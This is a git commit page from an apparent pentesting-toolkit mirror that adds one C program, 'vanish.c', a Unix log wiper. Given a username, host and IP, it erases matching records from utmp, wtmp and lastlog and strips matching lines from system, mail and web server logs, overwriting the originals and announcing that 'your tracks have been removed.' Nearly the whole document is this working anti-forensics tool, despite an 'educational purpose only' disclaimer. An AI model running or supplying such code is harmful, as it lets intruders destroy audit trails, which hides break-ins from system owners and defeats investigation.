Git-Mirrors/sec-pentesting-toolkit
1
0
Fork 0
mirror of https://github.com/autistic-symposium/sec-pentesting-toolkit.git synced 2025-05-04 15:55:12 -04:00
Code Issues Projects Releases Packages Wiki Activity

some memory exploitation snippets

Browse source
This commit is contained in:
Mari Wahl 2015-02-12 13:50:03 -08:00
parent d987311195
commit ab05e249d4
19 changed files with 2613 additions and 0 deletions
Download patch file Download diff file Expand all files Collapse all files

201
Memory_Exploits/C-codes/leave_no_log.c Normal file
View file

@ -0,0 +1,201 @@
/* Leave no logs */
/***************************************************************************
vanish.c - description
-------------------
begin : Wed Feb 2 2000
copyright : (C) 2000 by Neo the Hacker
email : --------------------------
***************************************************************************/
/***************************************************************************
* Vanish.c cleans WTMP, UTMP, lastlog, messages, secure, xferlog, maillog, *
* warn, mail, httpd.access_log, httpd.error_log. Use your brain, check your*
* logs and edit accordingly !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!*
****************************************************************************
* Warning!! This programm is for educational purpouse only! I am not *
* responsible to anything you do with this !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!*
****************************************************************************
* Code written for Unix like systems! Tested on SuSE-Linux 6.2 ! *
* Compile like: gcc vanish.c -o vanish *
***************************************************************************/
#include <stdio.h>
#include <fcntl.h>
#include <utmp.h>
#include <sys/types.h>
#include <unistd.h>
#include <lastlog.h>
#include <pwd.h>
#define UTMP "/var/run/utmp"
#define WTMP "/var/log/wtmp"
#define LASTLOG "/var/log/lastlog"
#define MESSAGES "/var/log/messages"
#define SECURE "/var/log/secure"
#define XFERLOG "/var/log/xferlog"
#define MAILLOG "/var/log/maillog"
#define WARN "/var/log/warn"
#define MAIL "/var/log/mail"
#define HTTPDA "/var/log/httpd.access_log"
#define HTTPDE "/var/log/httpd.error_log"
#define MAXBUFF 8*1024
int main(int argc, char *argv[])
{
struct utmp ut ;
struct lastlog ll ;
struct passwd *pass ;
int i, size, fin, fout ;
FILE *pfile;
FILE *pfile2;
char *varlogs[] = {MESSAGES, SECURE, XFERLOG, MAILLOG, WARN, MAIL, HTTPDA,HTTPDE} ;
char *newlogs[] = {"messages.hm", "secure.hm","xferlog.hm","maillog.hm","warn.hm",
"mail.hm", "httpda.hm", "httpde.hm"} ;
char buffer[MAXBUFF] ;
char user[10] ;
char host[100] ;
char host_ip[17] ;
/*Usage of the programm*/
if (argc!=4)
{
printf ("\n\n");
fprintf(stderr, "Vanish by Neo the Hacker\n");
fprintf(stderr, "Usage: %s <user> <host> <IP>\n\n",argv[0]) ;
exit () ;
}
/***************************
* OK Let's start with UTMP *
***************************/
size = sizeof(ut) ;
strcpy (user, argv[1]) ;
fin = open (UTMP, O_RDWR) ;
if (fin < 0)
{
fprintf(stderr, "\nFucking shit!! Utmp permission denied.Getting outta here!!\n");
close (fin) ;
exit();
}
else
{
while (read (fin, &ut, size) == size) {
if (!strncmp(ut.ut_user, user, strlen(user))) {
memset(&ut, 0, size);
lseek(fin, -1*size, SEEK_CUR);
write (fin, &ut, size);
}
}
close (fin);
printf("\nutmp target processed.");
}
/***************************
* OK Let's go on with WTMP *
***************************/
strcpy (host, argv[2]) ;
strcpy(host_ip, argv[3]) ;
fin = open(WTMP, O_RDONLY) ;
if (fin < 0) {
fprintf(stderr, "\nFucking shit!! Wtmp permission denied.Getting outta here.\n") ;
close (fin) ; exit () ;
}
fout = open("wtmp.hm", O_WRONLY|O_CREAT) ;
if (fout < 0) {
fprintf(stderr, "\nDamn! Problems targeting wtmp. Getting outta here.\n") ;
close (fout) ;
exit () ;
}
else {
while (read (fin, &ut, size) == size) {
if ( (!strcmp(ut.ut_user, user)) || (!strncmp(ut.ut_host, host, strlen(host))) ) {
/* let it go into oblivion */ ;
}
else write (fout, &ut, size) ; }
close (fin) ;
close (fout) ;
if ((system("/bin/mv wtmp.hm /var/log/wtmp") < 0) &&
(system("/bin/mv wtmp.hm /var/log/wtmp") == 127)) {
fprintf(stderr, "\nAch. Couldn't replace %s .", WTMP) ;
}
system("/bin/chmod 644 /var/log/wtmp") ;
printf("\nwtmp target processed.") ;
}
/***************************
* OK Let's look at LASTLOG *
***************************/
size = sizeof(ll) ;
fin = open(LASTLOG, O_RDWR) ;
if (fin < 0) {
fprintf(stderr, "\nFucking shit!! Lastlog permission denied.Getting outta here.\n") ;
close (fin) ;
exit () ;
}
else {
pass = getpwnam(user) ;
lseek(fin, size*pass->pw_uid, SEEK_SET) ;
read(fin, &ll, size) ;
ll.ll_time = 0 ;
strncpy (ll.ll_line, " ", 5) ;
strcpy (ll.ll_host, " ") ;
lseek(fin, size*pass->pw_uid, SEEK_SET) ;
write(fin, &ll, size) ;
close (fin) ;
printf("\nlastlog target processed.\n") ;
}
/**************************
* OK moving to /var .... *
**************************/
i=0;
while (i<8) {
printf("Processing %s\t", varlogs[i]) ;
pfile = fopen (varlogs[i],"r");
if (!pfile)
{
printf("Couldn't open %s\n\n", varlogs[i]);
i++;
continue ;
}
pfile2 = fopen (newlogs[i],"w");
if (!pfile2)
{
printf("Couldn't create backup file!
You have to have write permission to the folder!! %s \n\n", newlogs[i]);
i++;
continue;
}
else {
while (fgets(buffer, MAXBUFF, pfile) != NULL) {
if ((!strstr(buffer, user)) && (!strstr(buffer, host))&&(!strstr(buffer, host_ip))) {
fputs(buffer,pfile2) ; } }
}
fclose (pfile);
fclose (pfile2);
printf (" DONE.\n");
i++;
}
printf ("\n\n");
system ("mv messages.hm /var/log/messages");
system ("mv secure.hm /var/log/secure");
system ("mv xferlog.hm /var/log/xferlog");
system ("mv maillog.hm /var/log/maillog");
system ("mv warn.hm /var/log/warn");
system ("mv mail.hm /var/log/mail");
system ("mv httpda.hm /var/log/httpd.access_log");
system ("mv httpde.hm /var/log/httpd.error_log");
printf ("\n\n");
printf ("V_A_N_I_S_H_E_D_!\n");
printf ("Your tracks have been removed\n");
printf ("Exiting programm !!\n\n");
exit();
}